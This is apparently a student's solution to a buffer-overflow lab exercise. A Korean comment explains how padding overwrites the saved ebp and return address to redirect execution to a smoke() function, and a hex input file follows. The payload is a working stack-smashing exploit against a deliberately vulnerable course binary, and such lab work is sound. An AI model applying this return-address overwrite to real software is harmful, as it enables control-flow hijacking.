/*

미션 0의 목표는 smoke() 함수가 호출되게 하는것입니다.

세그폴트가 일어날때까지 0을 4바이트씩 넣어봤습니다.

x86에선 return address를 먼저 push하고, 그 다음 ebp를 push 합니다. ebp는
스택프레임의 시작주소입니다. 스택프레임엔 지역변수들이 들어있으니, ebp에 이상한
값을 쓰면 불가능한 곳에 지역변수들을 쓰거나 파라미터를 읽으려고 하거나 이것저것
할테니 세그폴이 뜰겁니다. 0을 넣다가 세그폴이 처음으로 뜨면, ebp를 건드렸다는
뜻입니다.

0을 많이 넣었더니 어느순간 세그폴이 뜨기시작했습니다. 거기서 0을 4바이트 더 넣고
- ebp를 넘어서 smoke 함수의 주소 4바이트를 그곳에 쓰면 - stored return address를
넢어씌우면 미션 0을 해결할 수 있습니다.

smoke() 함수의 위치는 0x08048c18로 고정되어있습니다. x86이므로, 리틀엔디안으로
변환하여 값을 넣어주면 문제가 해결됩니다.

*/

00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00 /* saved ebp */
18 8c 04 08 /* return addr */
